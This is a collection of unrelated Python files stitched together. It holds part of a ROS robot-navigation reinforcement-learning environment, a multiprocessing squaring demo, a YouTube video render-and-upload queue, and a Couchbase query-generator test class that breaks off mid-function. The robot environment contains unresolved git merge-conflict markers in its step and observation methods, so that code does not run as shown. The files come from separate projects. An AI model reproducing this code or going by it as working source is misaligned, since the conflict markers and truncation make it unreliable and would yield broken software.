self.odom_subscriber = rospy.Subscriber(self.topics.odom_topic, Odometry, self._odom_callback, queue_size=1)
self.pose_subscriber = rospy.Subscriber(self.topics.states_topic, ModelStates, self._state_callback,
queue_size=1)
def _scan_callback(self, data):
self.scan_single = np.asarray([data.ranges]).transpose()
# print("max:{}/ min:{}".format(np.max(scan), np.min(scan)))
min_dis_collision = self.scan_single.min()
if min_dis_collision < self.collision_threshold:
self.terminatec = True
self.publisher.publish(Twist())
def _odom_callback(self, data):
self.velocity = np.array([data.twist.twist.linear.x, data.twist.twist.angular.z])
def _state_callback(self, states):
for i in range(len(states.name)):
if states.name[i] == self.robot_name:
self.position = states.pose[i]
def _calculate_rel_goal(self):
robot_rel_y = self.goal[1] - self.position.position.y
robot_rel_x = self.goal[0] - self.position.position.x
distance = math.hypot(robot_rel_x, robot_rel_y)
sin_y = 2 * (self.position.orientation.w * self.position.orientation.z +
self.position.orientation.x * self.position.orientation.y)
cos_y = 1 - 2 * (self.position.orientation.y ** 2 + self.position.orientation.z ** 2)
orientation = np.arctan2(robot_rel_y, robot_rel_x) - np.arctan2(sin_y, cos_y)
if orientation > np.pi:
orientation -= 2 * np.pi
elif orientation < -np.pi:
orientation += 2 * np.pi
else:
orientation = orientation
return np.array([distance, orientation])
def _calculus_reward(self):
reward = 0
self.rel_goal = self._calculate_rel_goal()
if self.last_rel_goal is None:
self.last_rel_goal = copy.deepcopy(self.rel_goal)
if self.rel_goal[0] < self.target_threshold:
self.terminateg = True
reward += 20.
elif self.terminatec:
reward -= 20.
else:
reward = 0.2 * (self.last_rel_goal[0] - self.rel_goal[0])
self.last_rel_goal = copy.deepcopy(self.rel_goal)
return reward
def step(self, action, continuous=False):
if self.oscillation_detector.recognise(action):
self.total_oscillations += 1
# print("oscillation", end=": ")
if continuous:
action_final = action
else:
action_final = self.observation_filter.velocity_unwrapper(action)
# print("{}/{}".format(action_final[0], action_final[1]))
velocity = Twist()
velocity.linear.x = action_final[0]
velocity.angular.z = action_final[1]
while not (self.publisher.get_num_connections() > 0):
pass
self.publisher.publish(velocity)
self.step_size += 1
if self.step_size >= self.max_steps:
self.terminates = True
while rospy.get_rostime().to_sec() - self.last_time < self.step_time:
pass
self.last_time = rospy.get_rostime().to_sec()
obs, reward, done, info = self.get_observation()
<<<<<<< HEAD
# print("goal: {}; position: {}, collision:{}; terminate: {}; time_step_up:{}".format([self.goal[0], self.goal[1]],
# [self.position.position.x, self.position.position.y],
# self.terminatec, self.terminateg, self.terminates))
goal_pose = Pose()
goal_pose.position.x = self.goal[0]
goal_pose.position.y = self.goal[1]
self.display.display([self.position], [goal_pose], self.step_size)
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
self.trajectory.append([obs,
action,
reward,
self.step_size,
self.position,
rospy.get_rostime().to_sec(),
(self.terminatec, self.terminateg)])
return obs, reward, done, info
def get_terminate(self):
return self.terminatec or self.terminateg or self.terminates
def get_observation(self):
reward = self._calculus_reward()
processed_lidar = self.observation_filter.lidar_filter(self.scan_single)
processed_vel = self.observation_filter.velocity_filter(self.velocity)
processed_goal = self.observation_filter.goal_filter(self.rel_goal)
total = np.concatenate((processed_goal, processed_vel, processed_lidar), axis=0)
yaw = math.atan2(2 * (self.position.orientation.x * self.position.orientation.y +
self.position.orientation.w * self.position.orientation.z),
self.position.orientation.w * self.position.orientation.w +
self.position.orientation.x * self.position.orientation.x -
self.position.orientation.y * self.position.orientation.y -
self.position.orientation.z * self.position.orientation.z)
<<<<<<< HEAD
=======
print(yaw)
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
return total, reward, self.get_terminate(), {"collision": self.terminatec,
"success": self.terminateg,
"position": [self.position.position.x, self.position.position.y,
yaw],
"total_oscillation": self.total_oscillations,
"lidar": self.scan_single}
<<<<<<< HEAD
#
# class TrajectoryGenerator:
# def __init__(self, iterations=50):
# self.env = CrowdENV(scenarios_index=10, max_steps=100)
# self.policy = NNModule(velocity_threshold=self.env.vel_threshold, path="./", continuous=False)
# self.iterations = iterations
#
# def run(self, scenarios=range(0, 20, 1)):
# for i in scenarios:
# if i < 8:
# self.env.max_steps = 300
# elif i < 10:
# self.env.max_steps = 300
# elif i < 14:
# self.env.max_steps = 400
# elif i < 18:
# self.env.max_steps = 500
# else:
# self.env.max_steps = 800
# self.get_trajectory(i)
#
# def get_trajectory(self, scenario):
# # for i in range(steps):
# value = 0
# total_trajectories = []
#
# obs, reward, done, _ = self.env.reset(scenario)
#
# while (not rospy.is_shutdown()) and (value < self.iterations):
#
# if done:
# value += 1
# total_trajectories.append(copy.deepcopy(self.env.trajectory))
# print((self.env.terminateg, self.env.terminatec), end=" ")
# obs, reward, done, _ = self.env.reset(scenario)
# print("obs: {}, reward: {}, done: {} ".format(obs.shape, reward,
# (self.env.terminateg, self.env.terminatec)))
#
# action = self.policy.step(obs)
# obs, reward, done, _ = self.env.step(action)
# print("{},{},{}".format(self.env.step_size, reward, done))
#
# np.save("trajectory_{}".format(scenario), np.asarray(total_trajectories))
#
#
# def run_iterations():
# tg = TrajectoryGenerator(2)
# tg.run([17])
#
#
# if __name__ == "__main__":
# rospy.init_node('robot', anonymous=True)
#
# t1 = threading.Thread(target=rospy.spin)
# t2 = threading.Thread(target=run_iterations)
#
# t1.start()
# t2.start()
#
# t2.join()
# t1.join()
=======
>>>>>>> 25ad69f87fc0158bde48b4eddcbe599de49c5edb
|
multi_processing.py
|
import multiprocessing
def square_mp(in_queue, out_queue):
while(True):
n = in_queue.get()
n_squared = n**2
out_queue.put(n_squared)
if __name__ == '__main__':
in_queue = multiprocessing.Queue()
out_queue = multiprocessing.Queue()
process = multiprocessing.Process(target=square_mp, args=(in_queue, out_queue))
process.start()
for i in range(10):
in_queue.put(i)
i_squared = out_queue.get()
print(f"{i} squared is {i_squared}")
process.terminate()
|
youtubequeue.py
|
import os
import settings
settings.generateConfigFile()
import soundfile as sf
from pydub import AudioSegment
import generatorclient
from time import sleep
from subprocess import *
import videouploader
from threading import Thread
import pickle
import datetime
from datetime import timedelta
import subprocess
import videoscript
import random
from moviepy.editor import *
# 18:00 19:00 20:00 23:00 00:00 01:00
waitTill = None
scriptIBuffer = []
def loadVideoScripts():
vidsaves = os.listdir(settings.rawvideosaves)
print(vidsaves)
for vid in vidsaves:
path = settings.rawvideosaves + "/" + vid
with open(path, 'rb') as pickle_file:
script = pickle.load(pickle_file)
videoscript.videoscripts.append(script)
def parseScripts():
for musicType in generatorclient.musicTypes:
if not os.path.exists(settings.assetPath + "/Music/%s" % musicType):
print("Creating Music Path for %s: %s" % (musicType, settings.assetPath + "/Music/%s" % musicType))
os.makedirs(settings.assetPath + "/Music/%s" % musicType)
if len(os.listdir(settings.assetPath + "/Music/%s/" % musicType)) == 0:
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (settings.assetPath + "/Music/%s/" % musicType))
while True:
sleep(10)
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (
settings.assetPath + "/Music/%s/" % musicType))
pass
if scriptIBuffer:
for script in scriptIBuffer:
scriptno = script[0]
print("Parsing Raw Script %s" % scriptno)
scripttitle = script[1]
author = script[2]
ups = script[3]
payload = script[4]
final_script = payload[0]
videotype = payload[1]
video_settings = payload[2]
music_type = payload[3]
thumbnail = payload[4]
characters_amount = payload[5]
youtube_title = payload[6]
youtube_description = payload[7]
youtube_tags = payload[8]
videoscript.VideoScriptEngine(scriptno, scripttitle, author, ups, final_script, videotype, video_settings,
music_type, thumbnail, characters_amount, youtube_title, youtube_description,
youtube_tags)
scriptIBuffer.clear()
else:
print("VIDEO GENERATOR no scripts to parse")
def uploadVids():
pass
"""
if renderedVids:
for vid in renderedVids:
vid.generateMovie()
renderedVids.clear()
loadVideoScripts()
"""
def canUpload():
if generatorclient.last_upload_times is not None:
if generatorclient.last_upload_times == 0:
return settings.uploads_a_day
now = datetime.datetime.now()
vids_within_day = 0
for time in generatorclient.last_upload_times:
time = time[0]
if now.hour >= settings.youtube_api_quota_reset_hour:
if time > now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0):
vids_within_day += 1
else:
if time >= now - timedelta(days=1):
vids_within_day += 1
print("%s Videos uploaded since %s:00" % (vids_within_day, settings.youtube_api_quota_reset_hour))
print("Estimated quote usage %s" % (vids_within_day * 1658))
return settings.uploads_a_day - vids_within_day
return False
def tickThread():
global waitTill
while True:
sleep(5)
if generatorclient.last_upload_times is None and not generatorclient.isRequestingScripts:
print("No update times available... requesting more")
generatorclient.getLastUploadedScripts()
sleep(5)
if videoscript.videoscripts:
print("Rendering all video scripts...")
for script in videoscript.videoscripts:
script.renderVideo()
if waitTill is not None:
if datetime.datetime.now() > waitTill:
waitTill = None
else:
print("Out of Quote Response... waiting till %s" % waitTill)
if settings.exportOffline:
waitTill = None
if not settings.exportOffline:
if waitTill is None:
amount_to_upload = canUpload()
if type(amount_to_upload) is int:
scripts_available_to_upload = [script for i, script in enumerate(videoscript.videoscripts) if
script.isRendered]
print("Allowed to upload %s videos" % amount_to_upload)
if amount_to_upload > len(scripts_available_to_upload):
amount_to_upload = len(scripts_available_to_upload)
print("Only %s scripts available to upload" % amount_to_upload)
print("Uploading %s video scripts... %s ready to upload (total %s)" % (
amount_to_upload, amount_to_upload, len(videoscript.videoscripts)))
for i in range(0, amount_to_upload, 1):
upload = scripts_available_to_upload[i].uploadVideo()
try:
if upload is False:
now = datetime.datetime.now()
if now.hour > settings.youtube_api_quota_reset_hour:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0) + timedelta(days=1)
else:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0)
except Exception as e:
print(e)
pass
generatorclient.last_upload_times = None
# elif type(amount_to_upload) is bool:
# print("Can't get last update times")
else:
print("Estimated out of quotes waiting till %s" % waitTill)
else:
print("No video scripts, just chilling...")
if not generatorclient.isRequestingScripts:
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
def initQueue():
## process = subprocess.call("wine /home/royalreddit/Desktop/balcon/balcon.exe -t supnerds -w /home/royalreddit/Desktop/test2.wav", shell = True)
if not os.path.exists(settings.videoqueue_directory):
os.mkdir(settings.videoqueue_directory)
if not os.path.exists(settings.rawvideosaves):
os.mkdir(settings.rawvideosaves)
if not os.path.exists(settings.finishedvideosdirectory):
os.mkdir(settings.finishedvideosdirectory)
if not os.path.exists(f"{settings.currentPath}/TempVids"):
os.mkdir(f"{settings.currentPath}/TempVids")
loadVideoScripts()
generatorclient.connectToServer()
sleep(2)
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
thread = Thread(target=tickThread)
thread.start()
# uploadVids()
if __name__ == "__main__":
begin = True
if not settings.exportOffline:
videouploader.get_credentials()
else:
print("Video Generator launching in export offline mode")
if not settings.noSpeech:
if settings.use_balcon and settings.use_google_tts:
print("You have selected to use both google tts and balcon tts! Please only select one in the config file!")
begin = False
if not settings.use_balcon and not settings.use_google_tts:
print("You have not selected any tts options in the config file!"
" Please set either google tts or balcon tts to true! Not both!")
begin = False
if settings.use_balcon:
command = "%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Success", settings.balcon_voice)
process = subprocess.call(command, shell=True)
if process != 0:
print("Balcon not found. This will work when the following command works in your commandline: %s" % ("%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Test", settings.balcon_voice)))
begin = False
if begin:
initQueue()
|
base_test_rqg.py
|
import paramiko
from basetestcase import BaseTestCase
import os
import zipfile
import Queue
import json
import threading
from memcached.helper.data_helper import VBucketAwareMemcached
from rqg_mysql_client import RQGMySQLClient
from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.tuq_helper import N1QLHelper
from rqg_query_helper import RQGQueryHelper
from remote.remote_util import RemoteMachineShellConnection
import random
from itertools import combinations
import shutil
from os import listdir
from os.path import isfile, join
import traceback
from rqg_postgres_client import RQGPostgresClient
from membase.api.exception import CBQError
class BaseRQGTests(BaseTestCase):
def setUp(self):
try:
super(BaseRQGTests, self).setUp()
self.log.info("============== RQG Setup Has Started ==============")
self.client_map = {}
self.check_covering_index = self.input.param("check_covering_index", True)
self.skip_setup_cleanup = True
self.crud_ops = self.input.param("crud_ops", False)
self.ansi_joins = self.input.param("ansi_joins", False)
self.with_let = self.input.param("with_let", False)
self.ansi_transform = self.input.param("ansi_transform", False)
self.prepared = self.input.param("prepared", False)
self.hash_joins = self.input.param("hash_joins", False)
self.create_secondary_meta_indexes = self.input.param("create_secondary_meta_indexes", False)
self.aggregate_pushdown = self.input.param("aggregate_pushdown", False)
self.create_secondary_ansi_join_indexes = self.input.param("create_secondary_ansi_join_indexes", False)
self.remove_alias = self.input.param("remove_alias", True)
self.skip_cleanup = self.input.param("skip_cleanup", False)
self.build_secondary_index_in_seq = self.input.param("build_secondary_index_in_seq", False)
self.number_of_buckets = self.input.param("number_of_buckets", 5)
self.crud_type = self.input.param("crud_type", "update")
self.populate_with_replay = self.input.param("populate_with_replay", False)
self.crud_batch_size = self.input.param("crud_batch_size", 1)
self.record_failure = self.input.param("record_failure", False)
self.failure_record_path = self.input.param("failure_record_path", "/tmp")
self.use_mysql = self.input.param("use_mysql", False)
self.use_postgres = self.input.param("use_postgres", False)
self.initial_loading_to_cb = self.input.param("initial_loading_to_cb", True)
self.change_bucket_properties = self.input.param("change_bucket_properties", False)
self.database = self.input.param("database", "flightstats")
self.merge_operation = self.input.param("merge_operation", False)
self.load_copy_table = self.input.param("load_copy_table", False)
self.user_id = self.input.param("user_id", "root")
self.user_cluster = self.input.param("user_cluster", "Administrator")
self.password = self.input.param("password", "")
self.password_cluster = self.input.param("password_cluster", "password")
self.generate_input_only = self.input.param("generate_input_only", False)
self.using_gsi = self.input.param("using_gsi", True)
self.reset_database = self.input.param("reset_database", True)
self.create_primary_index = self.input.param("create_primary_index", False)
self.create_secondary_indexes = self.input.param("create_secondary_indexes", False)
self.use_advisor = self.input.param("use_advisor", False)
self.items = self.input.param("items", 1000)
self.mysql_url = self.input.param("mysql_url", "localhost")
self.mysql_url = self.mysql_url.replace("_", ".")
self.gen_secondary_indexes = self.input.param("gen_secondary_indexes", False)
self.gen_gsi_indexes = self.input.param("gen_gsi_indexes", True)
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql")
self.create_all_indexes = self.input.param("create_all_indexes", False)
self.concurreny_count = self.input.param("concurreny_count", 10)
self.total_queries = self.input.param("total_queries", None)
self.run_query_without_index_hint = self.input.param("run_query_without_index_hint", True)
self.run_query_with_primary = self.input.param("run_query_with_primary", False)
self.run_query_with_secondary = self.input.param("run_query_with_secondary", False)
self.run_explain_with_hints = self.input.param("run_explain_with_hints", False)
self.test_file_path = self.input.param("test_file_path", None)
self.secondary_index_info_path = self.input.param("secondary_index_info_path", None)
self.db_dump_path = self.input.param("db_dump_path", None)
self.input_rqg_path = self.input.param("input_rqg_path", None)
self.set_limit = self.input.param("set_limit", 0)
self.build_index_batch_size = self.input.param("build_index_batch_size", 1000)
self.query_count = 0
self.use_rest = self.input.param("use_rest", True)
self.ram_quota = self.input.param("ram_quota", 512)
self.drop_index = self.input.param("drop_index", False)
self.drop_bucket = self.input.param("drop_bucket", False)
self.dynamic_indexing = self.input.param("dynamic_indexing", False)
self.partitioned_indexes = self.input.param("partitioned_indexes", False)
self.pushdown = self.input.param("pushdown", False)
self.subquery = self.input.param("subquery", False)
self.drop_secondary_indexes = self.input.param("drop_secondary_indexes", True)
self.query_helper = self._initialize_rqg_query_helper()
self.n1ql_helper = self._initialize_n1ql_helper()
self.rest = RestConnection(self.master)
self.indexer_memQuota = self.input.param("indexer_memQuota", 1024)
self.teardown_mysql = self.use_mysql and self.reset_database and (not self.skip_cleanup)
self.keyword_list = self.query_helper._read_keywords_from_file("b/resources/rqg/n1ql_info/keywords.txt")
self.use_secondary_index = self.run_query_with_secondary or self.run_explain_with_hints
self.check_explain_plan = self.input.param("explain_plan", False)
self.index_limit = self.input.param("index_limit", 5)
self.advise_server = self.input.advisor
self.advise_buckets = ["bucket_01", "bucket_02", "bucket_03", "bucket_04", "bucket_05", "bucket_06", "bucket_07", "bucket_08", "bucket_09", "bucket_10"]
self.advise_dict={}
if self.input_rqg_path is not None:
self.secondary_index_info_path = self.input_rqg_path+"/index/secondary_index_definitions.txt"
self.db_dump_path = self.input_rqg_path+"/db_dump/database_dump.zip"
self.test_file_path = self.input_rqg_path+"/input/source_input_rqg_run.txt"
if self.initial_loading_to_cb:
self._initialize_cluster_setup()
if self.subquery:
self.items = 500
if not self.use_rest:
self._ssh_client = paramiko.SSHClient()
self._ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.os = self.shell.extract_remote_info().type.lower()
except Exception, ex:
self.log.info("============== RQG Setup Has Failed ==============")
traceback.print_exc()
self.assertTrue(False)
self.tearDown()
self.log.info("============== RQG Setup Has Completed ==============")
def tearDown(self):
try:
self.log.info("============== RQG BasTestCase Teardown Has Started ==============")
super(BaseRQGTests, self).tearDown()
self.log.info("============== RQG BasTestCase Teardown Has Completed ==============")
self.log.info("============== RQG Teardown Has Started ==============")
if hasattr(self, 'reset_database'):
if self.teardown_mysql:
client = RQGMySQLClient(database=self.database, host=self.mysql_url, user_id=self.user_id, password=self.password)
self.kill_mysql_processes(client)
client.drop_database(self.database)
except Exception, ex:
self.log.info("============== RQG Teardown Has Failed ==============")
self.log.info(ex)
self.log.info("============== RQG Teardown Has Completed ==============")
def kill_mysql_processes(self, client):
columns, rows = client._execute_query(query="select concat('KILL ',id,';') from information_schema.processlist where user='root' and time > 0;")
sql_result = client._gen_json_from_results(columns, rows)
for result in sql_result:
for key in result.keys():
query = result[key]
# execute kill query
client._db_execute_query(query=query)
client.drop_database(self.database)
def test_rqg(self):
try:
# Get Data Map
table_list = self.client._get_table_list()
table_map = self.client._get_values_with_type_for_fields_in_table()
if self.remove_alias:
table_map = self.remove_aliases_from_table_map(table_map)
if self.crud_ops:
table_list.remove("copy_simple_table")
query_template_list = self.extract_query_templates()
# Generate the query batches based on the given template file and the concurrency count
batches = self.generate_batches(table_list, query_template_list)
result_queue = Queue.Queue()
failure_queue = Queue.Queue()
input_queue = Queue.Queue()
# Run Test Batches
thread_list = []
start_test_case_number = 1
if self.crud_ops:
for table_name in table_list:
if len(batches[table_name]) > 0:
self._crud_ops_worker(batches[table_name], table_name, table_map, result_queue, failure_queue)
#t = threading.Thread(target=self._crud_ops_worker, args=(
#batches[table_name], table_name, table_map, result_queue, failure_queue))
#t.daemon = True
#t.start()
#thread_list.append(t)
#for t in thread_list:
#t.join()
else:
while not batches.empty():
# Split up the batches and send them to the worker threads
try:
test_batch = batches.get(False)
except Exception, ex:
break
test_query_template_list = [test_data[test_data.keys()[0]] for test_data in test_batch]
input_queue.put({"start_test_case_number": start_test_case_number,
"query_template_list": test_query_template_list})
start_test_case_number += len(test_query_template_list)
for table_name in table_list:
# Create threads based on number of tables (each table has its own thread)
self._rqg_worker(table_name, table_map, input_queue, result_queue,
failure_queue)
#t = threading.Thread(target=self._rqg_worker,
# args=(table_name, table_map, input_queue, result_queue,
# failure_queue))
#t.daemon = True
#t.start()
#thread_list.append(t)
#for t in thread_list:
# if(t.is_alive()):
# t.join()
# Analyze the results for the failure and assert on the run
self.analyze_test(result_queue, failure_queue)
except Exception, ex:
traceback.print_exc()
self.log.info(ex)
self.assertFalse(True)
def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
count = 0
table_name_description_map = {table_name: table_map[table_name]}
while True:
if self.total_queries <= self.query_count:
break
if not input_queue.empty():
data = input_queue.get()
start_test_case_number = data["start_test_case_number"]
query_template_list = data["query_template_list"]
# create strings for queries and indexes but doesnt send indexes to Couchbase
sql_n1ql_index_map_list = self.client._convert_template_query_info(table_map=table_name_description_map,
n1ql_queries=query_template_list,
define_gsi_index=self.use_secondary_index,
aggregate_pushdown=self.aggregate_pushdown,
partitioned_indexes=self.partitioned_indexes,
ansi_joins=self.ansi_joins,
with_let=self.with_let)
for sql_n1ql_index_map in sql_n1ql_index_map_list:
sql_n1ql_index_map["n1ql"] = sql_n1ql_index_map['n1ql'].replace("simple_table", self.database+"_"+"simple_table")
# build indexes
if self.use_secondary_index:
self._generate_secondary_indexes_in_batches(sql_n1ql_index_map_list)
thread_list = []
test_case_number = start_test_case_number
for test_case_input in sql_n1ql_index_map_list:
t = threading.Thread(target=self._run_basic_test, args=(test_case_input, test_case_number, result_queue, failure_record_queue))
#self._run_basic_test(test_case_input, test_case_number, result_queue, failure_record_queue)
test_case_number += 1
t.daemon = True
t.start()
thread_list.append(t)
# Drop all the secondary Indexes
for t in thread_list:
t.join()
if self.use_secondary_index and self.drop_secondary_indexes:
self._drop_secondary_indexes_in_batches(sql_n1ql_index_map_list)
else:
count += 1
if count > 1000:
return
def n1ql_query_runner_wrapper(self, n1ql_query="", server=None, query_params={}, scan_consistency=None, verbose=True):
if self.use_advisor:
self.create_secondary_index(n1ql_query=n1ql_query)
result = self.n1ql_helper.run_cbq_query(query=n1ql_query, server=server, query_params=query_params, scan_consistency=scan_consistency, verbose=verbose)
return result
def prepare_advise_query(self, n1ql_query=""):
for bucket in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(bucket, self.advise_dict[bucket])
return n1ql_query
def translate_index_statement(self, n1ql_query=""):
for key in self.advise_dict.keys():
n1ql_query = n1ql_query.replace(self.advise_dict[key], key)
return n1ql_query
def create_secondary_index(self, n1ql_query=""):
if self.count_secondary_indexes() >= self.index_limit:
self.remove_all_secondary_indexes()
self.n1ql_helper.wait_for_all_indexes_online()
advise_query = self.prepare_advise_query(n1ql_query=n1ql_query)
advise_result = self.n1ql_helper.run_cbq_query(query="ADVISE " + advise_query,
server=self.advise_server)
if len(advise_result["results"][0]["advice"]["adviseinfo"]) == 0:
return
if "index recommendation at this time" not in str(
str(advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"])):
if "indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
self.n1ql_helper.wait_for_all_indexes_online()
try:
prepared_index_statement = self.translate_index_statement(index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper.wait_for_all_indexes_online()
except CBQError, ex:
if "already exists" in str(ex):
continue
if "covering_indexes" in advise_result["results"][0]["advice"]["adviseinfo"][0][
"recommended_indexes"].keys():
for index_statement_array in advise_result["results"][0]["advice"]["adviseinfo"][0]["recommended_indexes"]["covering_indexes"]:
index_statement = index_statement_array["index_statement"]
if index_statement != "":
self.n1ql_helper.wait_for_all_indexes_online()
try:
prepared_index_statement = self.translate_index_statement(index_statement)
self.n1ql_helper.run_cbq_query(prepared_index_statement)
self.n1ql_helper.wait_for_all_indexes_online()
except CBQError, ex:
if "already exists" in str(ex):
continue
def count_secondary_indexes(self):
count = self.n1ql_helper.run_cbq_query("select count(*) from system:indexes")
return int(count["results"][0]["$1"])
def remove_all_secondary_indexes(self):
self.n1ql_helper.drop_all_indexes()
def _run_basic_test(self, query_test_map, test_case_number, result_queue, failure_record_queue=None):
n1ql_query = query_test_map["n1ql"]
sql_query = query_test_map["sql"]
indexes = query_test_map["indexes"]
expected_result = query_test_map["expected_result"]
sql_query, n1ql_query = self.handle_limit_offset(sql_query, n1ql_query)
n1ql_query = self.handle_n1ql_table_name(n1ql_query)
sql_query, n1ql_query, aggregate = self.handle_subquery(sql_query, n1ql_query)
n1ql_query = self.handle_hash_join(n1ql_query)
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< BEGIN RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(
test_case_number))
# results dict
result_run = dict()
result_run["n1ql_query"] = n1ql_query
result_run["sql_query"] = sql_query
result_run["test_case_number"] = test_case_number
if self.ansi_transform:
result = self._run_explain_queries(n1ql_query=n1ql_query, keyword="u'outer':u'True'", present=False)
result_run.update(result)
if self.check_explain_plan:
result_run['check_explain_plan'] = self._check_explain_plan_for_secondary_index(n1ql_query=n1ql_query);
# run the query
result_run["run_query_without_index_hint"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query,
sql_query=sql_query,
expected_result=expected_result)
if expected_result is None:
expected_result = self._gen_expected_result(sql_query, test_case_number)
query_test_map["expected_result"] = expected_result
if self.set_limit > 0 and n1ql_query.find("DISTINCT") > 0:
result_limit = self.query_helper._add_limit_to_query(n1ql_query, self.set_limit)
result_run["run_query_with_limit"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=result_limit,
sql_query=sql_query,
expected_result=expected_result)
if self.run_query_with_primary:
index_info = [{"name": "`#primary`", "type": "GSI"}]
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, index_info)
result_run["run_query_with_primary"] = self._run_queries_and_verify(aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.aggregate_pushdown == "primary" and not self.with_let:
result_run["aggregate_explain_check::#primary"] = self._run_query_with_pushdown_check(n1ql_query,
index_info)
if self.run_query_with_secondary:
for index_name in indexes.keys():
n1ql_query_with_hints = self.query_helper._add_index_hints_to_query(n1ql_query, [indexes[index_name]])
result_run["run_query_with_index_name::{0}" + str(index_name)] = self._run_queries_and_verify(
aggregate=aggregate,
subquery=self.subquery,
n1ql_query=n1ql_query_with_hints,
sql_query=sql_query,
expected_result=expected_result)
if self.run_explain_with_hints:
result = self._run_queries_with_explain(n1ql_query, indexes)
result_run.update(result)
if self.aggregate_pushdown and not self.with_let:
for index_name in indexes.keys():
result_run["aggregate_explain_check::" + str(index_name)] = self._run_query_with_pushdown_check(
n1ql_query,
indexes[index_name])
if self.ansi_joins and self.hash_joins:
self._verify_query_with_hash_joins(n1ql_query)
result_queue.put(result_run)
self._check_and_push_failure_record_queue(result_run, query_test_map, failure_record_queue)
self.query_count += 1
self.log.info(" <<<<<<<<<<<<<<<<<<<<<<<<<<<< END RUNNING TEST {0} >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>".format(test_case_number))
def _crud_ops_worker(self, list_info, table_name, table_map, result_queue=None, failure_record_queue=None):
table_name_map = {table_name: table_map[table_name]}
for test_data in list_info:
test_case_number = test_data.keys()[0]
test_data = test_data[test_case_number]
data_info = self.convert_crud_ops_query(table_name, [test_data], table_name_map)
verification_query = "SELECT * from {0} where primary_key_id is not null ORDER by primary_key_id".format(table_name)
self._run_basic_crud_test(data_info[0], verification_query, test_case_number, result_queue, failure_record_queue, table_name=table_name)
self._populate_delta_buckets(table_name)
self.wait_for_num_items(table_name, 1000)
def remove_aliases_from_table_map(self, table_map):
for key in table_map.keys():
if "alias_name" in table_map[key].keys():
table_map[key].pop("alias_name")
return table_map
def extract_query_templates(self):
file_paths = self.test_file_path.split(":")
query_template_list = []
for file_path in file_paths:
file_path = self.unzip_template(file_path)
cur_queries_list = []
with open(file_path) as f:
cur_queries_list = f.readlines()
for q in cur_queries_list:
query_template_list.append(q)
if self.total_queries is None:
self.total_queries = len(query_template_list)
return query_template_list
def generate_batches(self, table_list, query_template_list):
if self.crud_ops:
batches = {}
for table_name in table_list:
batches[table_name] = []
else:
batches = Queue.Queue()
batch = []
count = 1
inserted_count = 0
test_case_number = 1
for template_query in query_template_list:
if self.crud_ops:
batches[table_list[test_case_number % (len(table_list))]].append({str(test_case_number): template_query})
else:
batch.append({str(test_case_number): template_query})
if count == self.concurreny_count:
inserted_count += len(batch)
batches.put(batch)
count = 1
batch = []
else:
count += 1
test_case_number += 1
if test_case_number > self.total_queries:
break
if not self.crud_ops:
if len(batch) > 0:
batches.put(batch)
return batches
def analyze_test(self, result_queue, failure_queue):
success, summary, result = self._test_result_analysis(result_queue)
self.log.info(result)
self.dump_failure_data(failure_queue)
self.assertTrue(success, summary)
def convert_crud_ops_query(self, table_name, data_info, table_name_map):
if self.crud_type == "update":
data_info = self.client_map[table_name]._convert_update_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info(
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_update":
data_info = self.client_map[table_name]._convert_update_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
elif self.crud_type == "merge_delete":
data_info = self.client_map[table_name]._convert_delete_template_query_info_with_merge(
source_table=self.database+"_"+"copy_simple_table",
target_table=table_name,
table_map=table_name_map,
n1ql_queries=data_info)
return data_info
def wait_for_num_items(self, table, num_items):
num_items_reached = False
while not num_items_reached:
self.sleep(1)
query = "SELECT COUNT(*) from {0}".format(self.database+"_"+table)
result = self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server)
if result["results"][0]["$1"] == num_items:
num_items_reached = True
def handle_limit_offset(self, sql_query, n1ql_query):
if "NUMERIC_VALUE1" in n1ql_query:
limit = random.randint(1, 30)
n1ql_query = n1ql_query.replace("NUMERIC_VALUE1", str(limit))
sql_query = sql_query.replace("NUMERIC_VALUE1", str(limit))
if limit < 10:
offset = limit - 2
else:
offset = limit - 10
if offset < 0:
offset = 0
n1ql_query = n1ql_query.replace("NUMERIC_VALUE2", str(offset))
sql_query = sql_query.replace("NUMERIC_VALUE2", str(offset))
self.log.info(" SQL QUERY :: {0}".format(sql_query))
self.log.info(" N1QL QUERY :: {0}".format(n1ql_query))
return sql_query, n1ql_query
def handle_n1ql_table_name(self, n1ql_query):
